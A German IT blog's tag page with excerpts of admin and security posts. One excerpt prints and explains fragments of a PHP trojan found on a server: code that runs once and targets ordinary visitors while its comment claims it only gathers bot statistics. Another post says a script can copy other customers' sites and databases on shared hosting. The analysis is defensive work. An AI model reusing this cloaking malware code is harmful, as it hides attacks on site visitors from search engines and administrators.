Artikel-Schlagworte: „Apache2“
PHP Trojaner von adveconfirm.com
18.03.2012 | 
Ich habe diverse Webseiten von einem Kollegen auf einen meiner Server verschiebt. Dabei waren plötzlich diverse Seiten von einer Ladezeit von 20 Sekunden betroffen. Also habe ich ein Blick in den Source riskiert und folgenden Code gefunden, wo ich zerstückelt hier analysiere:
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
Zuerst schaut der Code, ob er bereits einmal aufgeführt wurde, wenn nicht, startet er sich selbst, sonst lässt er es.
So führt sich der Code nur einmal aus.
// This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = "";
Der Code ist kommentiert 
Nett. Laut Kommentar erstellt es Statistiken von Bots.
if((strstr($sUserAgent, 'google') == false) // Bot comes
&& (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false)
&& (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false)
&& (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false)
&& (strstr($sUserAgent, 'bot') == false) && (strstr($sUserAgent, 'yahoo') == false))
{
Laut Kommentar, wenn ein Bot kommt, aber die Funktion macht das Gegenteil, wenn kein Bot kommt, also ein normaler User (keine opera und safari User)…
Diesen Beitrag weiterlesen »
Sonderzeichen in Domains unter Bind9/Apache2
Sonderzeichen in Domains sind nun seit einiger Zeit möglich.
So öffnete man sich den Markt um weitere Domains zu verkaufen und noch mehr Geld zu verdienen. Zum Glück wurden diese Domains nicht wirklich angenommen und sind nur vereinzelt anzutreffen.
Dennoch kommt es vor, das man auf dem eigenen Server eine solche Domain einrichten muss.
Bind9 und auch der Apache2 müssen mit dieser Domain zurecht kommen. Damit dies funktioniert wurde eine Verschlüsselung Namens Punycode entwickelt.
Diese ersetzt Sonderzeichen mit extrem schlecht aussehendem Code wie folgendes Beispiel zeigt:
Diesen Beitrag weiterlesen »
PHP Sicherheit bei Shared Hosting
Viele Hoster setzen auf Linux Server und auch Apache2.
Die User sind somit fähig auch PHP Skripte auf den Servern zu benutzen. Bei PHP gibt es 2 verschiedene Arten PHP einzubinden: mod_php und suphp. suphp hat eine verbesserte Sicherheit, aber ist langsamer und CPU lastiger. PHP verfügt zwar über ein SAFE_MODE, aber dieser ist mod_php keine wirkliche Sicherheit.
So kann man mit einer PHP Datei schnell mal andere Hostings backupen und sogar die Datenbank auslesen, ohne das der Betroffene etwas mitbekommt.
Egal auf welche Lösung der Hoster am Ende setzt, die Sicherheitseinstellungen von PHP bleiben die Gleichen, gegebenenfalls muss man nur die Verzeichnisstruktur und Exclude Liste anpassen. In meinem Beispiel verwende ich ein Skript, was auf Plesk ausgerichtet ist. Plesk ist wie Confixx auch eine Lösung von Parallels, wobei die Lösungen selbst nicht unsicherer/sicherer sind als Andere.
Doch damit die Hoster 100-1000de Kunden auf ein Server legen können, um den Gewinn zu maximieren, verzichten sie auf suphp und weitere Massnahmen um ein wenig Performance zu sparen und noch mehr Kunden auf einen Server zu bekommen.
Dieses Skript (Link) als Beispiel ermöglicht einem komplette Domains Diesen Beitrag weiterlesen »
Veröffentlicht in Confixx, Internet, Server, Sicherheit | 
Schlagworte: Apache2, Confixx, Hosting, Linux, PHP, Sicherheit
WordPress 3.x Menü Problem und Lösung
Eine der genialsten Neuerungen im WordPress 3.x waren vor Allem die Menüs die man einfach über die Administrationsoberfläche durch klicken und ziehen zusammenstellen konnte, sofern das Theme diese Funktionalität unterstützt.
Diversen Personen fällt auf, dass nach einer Anzahl von Menü Einträgen (bei mir waren es 16) alle weiteren Punkte abgeschnitten werden. So fehlte bei mir der 17 und 18te Eintrag.
Weiterhin wird aus dem letzten Menüpunkt dann der Typ “Benutzerdefiniert” und funktioniert nicht.
Das Problem ist nicht WordPress, sondern der darunterliegende Sever und die Konfiguration. Genauer gesagt der Suhosin Patch welcher die Variablenlänge der POST und GET auf 200 Zeichen beschränkt und daher die übergebene Variable einfach abschneidet.
Dieses Problem müsste normalerweise der Hoster beseitigen.
Dazu öffnet dieser die Datei /etc/php5/apache2/php.ini und fügt folgende 2 Zeilen Diesen Beitrag weiterlesen »
Fail2Ban Debian HowTo
Immer wieder wird ein Rootserver Ziel einer Attacke. Ob Spamer versuchen über den Server Mails zu versenden, der SSH Port angegriffen wird, es gibt sehr viele Angriffspunkte und diese müssen geschützt werden.
Ein Punkt ist das unterbinden von Bruteforce. Dazu muss iptables installiert und die Firewall beim booten aktiviert sein.
Dazu installiert man sich das Programm Fail2Ban wie folgt:
apt-get install fail2ban -y
cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
Anschliessend öffnet man die Datei /etc/fail2ban/jail.local und aktiviert die Dienste die man schützen möchte. Wenn man mein Debian Confixx HowTo verwendet hat für das Serversetup, dann sind folgende Zeilen zu aktivieren:
[ssh]
enabled = true
[proftpd]
enabled = true
[postfix]
enabled = true
[sasl]
enabled = true
Anschliessend muss man den Service nochmals neustarten mit:
/etc/init.d/fail2ban restart
Versucht anschliessend Jemand aus den Server zu connecten, dann wird seine IP für 5 Minuten auf den betroffenen Ports gesperrt. Einfach und schnell.
 Kontaktdaten |
IT Blögg? Ein männlicher IT Nerd durchstöbert das Web nach speziellen Gadgets, unentbehrlicher Software und Alles was man im IT Sektor nicht verpassen darf. + |